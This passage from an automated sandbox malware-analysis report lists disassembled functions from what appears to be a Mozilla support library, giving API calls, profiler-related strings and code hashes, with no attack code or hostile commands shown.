                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                              • String ID:
                                              • API String ID: 4054851604-0
                                              • Opcode ID: 96181f219f0c5487adb39265f19baf870ec5115811a22cd26c1a1102cd98c242
                                              • Instruction ID: 29ae0f3ea043da369295fa35dc6335c9f4e9e369eaaad5750817e847bdfa8de6
                                              • Opcode Fuzzy Hash: 96181f219f0c5487adb39265f19baf870ec5115811a22cd26c1a1102cd98c242
                                              • Instruction Fuzzy Hash: F7B16E3560C3818BEB14CF28C85465FB7E2AFC9358F154A1CE99567B91DB70ED0ACB82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 0-3566792288
                                              • Opcode ID: b290b7dea8941bdd8119d495f20d9246f65aeff94b4ed514ce41fae6174da3d5
                                              • Instruction ID: 6f8ccbe71eef87e7be6673da7823b54164df2aaf43b88693891f69c6eee99d66
                                              • Opcode Fuzzy Hash: b290b7dea8941bdd8119d495f20d9246f65aeff94b4ed514ce41fae6174da3d5
                                              • Instruction Fuzzy Hash: 3FD29F71A156018FC718CF19C490F55BBE1BF99326B2AC76DD86A8B7E5C732E841CB80
                                              APIs
                                              • InitializeConditionVariable.KERNEL32(?), ref: 6C506D45
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C506E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                              • String ID:
                                              • API String ID: 4169067295-0
                                              • Opcode ID: 2b89f49f52b001512d622ff32cec4f5be8b48b71c85d2d2fc5495b5bff9b8802
                                              • Instruction ID: aa684f81dd4672815577c64034d3c4404e89ce1ba607f8d42c3da50f25ac2f7b
                                              • Opcode Fuzzy Hash: 2b89f49f52b001512d622ff32cec4f5be8b48b71c85d2d2fc5495b5bff9b8802
                                              • Instruction Fuzzy Hash: EBA17F746183818FD715CF24C894BAEBBE2BFC9308F45491DE88A87751DB70A949CB92
                                              APIs
                                              • NtQueryVirtualMemory.NTDLL ref: 6C52B720
                                              • RtlNtStatusToDosError.NTDLL ref: 6C52B75A
                                              • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C4FFE3F,00000000,00000000,?,?,00000000,?,6C4FFE3F), ref: 6C52B760
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                              • String ID:
                                              • API String ID: 304294125-0
                                              • Opcode ID: e0f164fd00cae6fe70ad813489f4c447bebf03f79ce673ab56862dc44d65bb69
                                              • Instruction ID: b34d94695d78857c6256e35adf6eead4062f9d3e4c271bdd94662458b099ce15
                                              • Opcode Fuzzy Hash: e0f164fd00cae6fe70ad813489f4c447bebf03f79ce673ab56862dc44d65bb69
                                              • Instruction Fuzzy Hash: FCF0C87094021CEEDF01AAA1CC84BDF77FCDB4431DF146229D516655C0D778A5CCC6A1
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C4E4777
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 4275171209-1351931279
                                              • Opcode ID: 031c3c48fa269cf8d3810a6614ba79d11026897d4141ee92d50c2de50f6812ef
                                              • Instruction ID: a14fc261dd8bbf42bc2fc88cbbcf0563612ecf10d14b493d004ef36a778bdd8b
                                              • Opcode Fuzzy Hash: 031c3c48fa269cf8d3810a6614ba79d11026897d4141ee92d50c2de50f6812ef
                                              • Instruction Fuzzy Hash: D0B24C71A056018FD308CF29C550F15BBE2BFC9326B2AC7ADE4698B7A5D771E841CB80
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID:
                                              • API String ID: 3732870572-0
                                              • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                              • Instruction ID: 75bb75c72332334356d6dd4e73e57d6a2cb0c280619e00ad967e0abf681a6ebc
                                              • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                              • Instruction Fuzzy Hash: DF326372F011198BDF18CE9CC8A1BAEB7F2FB88300F15853AD506BB794D6386D458B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ~qLl
                                              • API String ID: 0-3881772974
                                              • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                              • Instruction ID: 0f8fd971567c6e49b04208df52c703b25784b0f560c01b7bc7910e3a595cd5e4
                                              • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                              • Instruction Fuzzy Hash: C732F871E0062ACFCB14CF98C990A9DFBB2FF88304F549569C949A7745E731A986CF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ~qLl
                                              • API String ID: 0-3881772974
                                              • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                              • Instruction ID: 27fb0730f73378b7735bcff952baca7979c471a0910c981828948ce87c5a0212
                                              • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                              • Instruction Fuzzy Hash: 5422E771E00629CFCB14CF98C990A9DF7B2FF88304F6495AAC549A7745E731A986CF90
                                              APIs
                                              • memcmp.VCRUNTIME140(?,?,6C4D4A63,?,?), ref: 6C505F06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: e0c1b8d635446228c519fce07e8dee266157afe5d371b3d72b6079285dd6fd6e
                                              • Instruction ID: 6d80197de2df654a7e8ab8ff0fcaba2d4515def83abb99403833fa93d4479cb2
                                              • Opcode Fuzzy Hash: e0c1b8d635446228c519fce07e8dee266157afe5d371b3d72b6079285dd6fd6e
                                              • Instruction Fuzzy Hash: ADC1D375E012098BCB04CF55C9906EEBBF2FF89318F68415DD855ABB44D732A906CF94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47e874b7cbb4ce2d49d9a062ff1f82ddd028edecb26554c7e264a7b00b4f1f3f
                                              • Instruction ID: 0790bb38a0b97ecb196dd2a16e6c67e96c47ffb4ace12e2e0a619964f9a2bea3
                                              • Opcode Fuzzy Hash: 47e874b7cbb4ce2d49d9a062ff1f82ddd028edecb26554c7e264a7b00b4f1f3f
                                              • Instruction Fuzzy Hash: 1E42A376B187508BD314CE3CC891B5AB3E2BFC9354F09472DE999A77A0D734D9418782
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                              • Instruction ID: 88635fa26b55bf75f28300497dc248fb13ae5432ea76699daf71a1677c577fb8
                                              • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                              • Instruction Fuzzy Hash: 93220575E00629CFDB14CF98C990AADFBB2FF88304F548299C45AA7705D771A986CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9bb616e9286f2d3735598cf66841af5f06e3588ef6f3ca2cf33184f0b5a209c7
                                              • Instruction ID: e3615a400784f59eed630da9c3d8132a1fc3d79d1d01575e40bead4577b2f95b
                                              • Opcode Fuzzy Hash: 9bb616e9286f2d3735598cf66841af5f06e3588ef6f3ca2cf33184f0b5a209c7
                                              • Instruction Fuzzy Hash: 66F14971A087658FDB00CEA8CC907AAB7E2AFC5318F159A2DE4D8877D1F374D8458792
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                              • Instruction ID: 6e891f65b649061a22172d13adaae74929eee77ea5b42a4b9af274fb649f7980
                                              • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                              • Instruction Fuzzy Hash: 32A1B075F0021A8BDB08CE69C891BAEB7F2EFC8355F188129D915E7791DB349C068BD1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Process$CurrentTerminate
                                              • String ID:
                                              • API String ID: 2429186680-0
                                              • Opcode ID: 689c65a03dc703df95b95f741b7e42f57f5af62f117665ce3711285e655b7a89
                                              • Instruction ID: f861a56440d7b420bbcdd2c23c392b8347b9d55c63db56e5d0b7f3228e5aac2c
                                              • Opcode Fuzzy Hash: 689c65a03dc703df95b95f741b7e42f57f5af62f117665ce3711285e655b7a89
                                              • Instruction Fuzzy Hash: 98716D75E012198FCF18CFA9D8906EEBBB2FF89354F24816ED915AB740D731A905CB90
                                              APIs
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C4D582D), ref: 6C50CC27
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C4D582D), ref: 6C50CC3D
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C53FE98,?,?,?,?,?,6C4D582D), ref: 6C50CC56
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C4D582D), ref: 6C50CC6C
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C4D582D), ref: 6C50CC82
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C4D582D), ref: 6C50CC98
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D582D), ref: 6C50CCAE
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C50CCC4
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C50CCDA
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C50CCEC
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C50CCFE
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C50CD14
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C50CD82
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C50CD98
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C50CDAE
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C50CDC4
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C50CDDA
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C50CDF0
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C50CE06
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C50CE1C
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C50CE32
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C50CE48
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C50CE5E
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C50CE74
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C50CE8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: strcmp
                                              • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                              • API String ID: 1004003707-2809817890
                                              • Opcode ID: 5ff129968f7b55d88dbd5c29bab26e252a600060706aa33f528e8ff5dc3db4b0
                                              • Instruction ID: 062271e2752347d849ac188fc51a9d75b48fc78fb75554f82b414ab84f15a3e4
                                              • Opcode Fuzzy Hash: 5ff129968f7b55d88dbd5c29bab26e252a600060706aa33f528e8ff5dc3db4b0
                                              • Instruction Fuzzy Hash: 0A51B9F3B4527592FA0171596D10BAA1505EFA324AF105936ED0FE5E80FF04BA09C6B7
                                              APIs
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C4D4801
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D4817
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D482D
                                              • __Init_thread_footer.LIBCMT ref: 6C4D484A
                                                • Part of subcall function 6C4FAB3F: EnterCriticalSection.KERNEL32(6C54E370,?,?,6C4C3527,6C54F6CC,?,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB49
                                                • Part of subcall function 6C4FAB3F: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C3527,6C54F6CC,?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FAB7C
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D485F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D487E
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4D488B
                                              • free.MOZGLUE(?), ref: 6C4D493A
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4D4956
                                              • free.MOZGLUE(00000000), ref: 6C4D4960
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4D499A
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • free.MOZGLUE(?), ref: 6C4D49C6
                                              • free.MOZGLUE(?), ref: 6C4D49E9
                                                • Part of subcall function 6C4E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                                • Part of subcall function 6C4E5E90: memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                                • Part of subcall function 6C4E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              Strings
                                              • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4D4812
                                              • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4D4828
                                              • MOZ_PROFILER_SHUTDOWN, xrefs: 6C4D4A42
                                              • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C4D47FC
                                              • [I %d/%d] profiler_shutdown, xrefs: 6C4D4A06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                              • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                              • API String ID: 1340022502-4194431170
                                              • Opcode ID: 792b709b95f7fcca3dbce49a8213f56d22c8b4cb2186accf02b20b4ce8a90f76
                                              • Instruction ID: 27bae8a4a39792f8ba794097de075c57e9d05ee906f26600b5b0d7996388f579
                                              • Opcode Fuzzy Hash: 792b709b95f7fcca3dbce49a8213f56d22c8b4cb2186accf02b20b4ce8a90f76
                                              • Instruction Fuzzy Hash: D681F271A001008BDB14FF28CCA4F5A37B1AF823ADF174269E91697B41E731F855CB9A
                                              APIs
                                                • Part of subcall function 6C4D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4D44B2,6C54E21C,6C54F7F8), ref: 6C4D473E
                                                • Part of subcall function 6C4D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C4D474A
                                              • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C4D44BA
                                              • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C4D44D2
                                              • InitOnceExecuteOnce.KERNEL32(6C54F80C,6C4CF240,?,?), ref: 6C4D451A
                                              • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C4D455C
                                              • LoadLibraryW.KERNEL32(?), ref: 6C4D4592
                                              • InitializeCriticalSection.KERNEL32(6C54F770), ref: 6C4D45A2
                                              • moz_xmalloc.MOZGLUE(00000008), ref: 6C4D45AA
                                              • moz_xmalloc.MOZGLUE(00000018), ref: 6C4D45BB
                                              • InitOnceExecuteOnce.KERNEL32(6C54F818,6C4CF240,?,?), ref: 6C4D4612
                                              • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C4D4636
                                              • LoadLibraryW.KERNEL32(user32.dll), ref: 6C4D4644
                                              • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C4D466D
                                              • VerSetConditionMask.NTDLL ref: 6C4D469F
                                              • VerSetConditionMask.NTDLL ref: 6C4D46AB
                                              • VerSetConditionMask.NTDLL ref: 6C4D46B2
                                              • VerSetConditionMask.NTDLL ref: 6C4D46B9
                                              • VerSetConditionMask.NTDLL ref: 6C4D46C0
                                              • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4D46CD
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6C4D46F1
                                              • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C4D46FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
